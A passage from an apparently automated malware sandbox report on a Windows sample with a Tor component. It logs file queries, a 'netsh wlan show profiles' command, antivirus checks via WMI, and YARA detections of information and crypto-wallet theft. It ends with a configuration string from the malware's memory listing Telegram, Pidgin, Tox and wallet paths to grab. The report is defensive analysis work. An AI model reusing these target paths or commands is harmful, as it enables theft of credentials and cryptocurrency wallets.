Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Queries volume information: C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

Code function: 25_2_6C092808 GetSystemTime,SystemTimeToFileTime,BIO_ctrl,

25_2_6C092808

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

Code function: 25_2_6C1BA406 DeregisterEventSource,GetVersion,

25_2_6C1BA406

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Uses netsh to modify the Windows network and firewall settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

AV process strings found (often used to terminate AV products)

Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Yara match	File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR

Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command 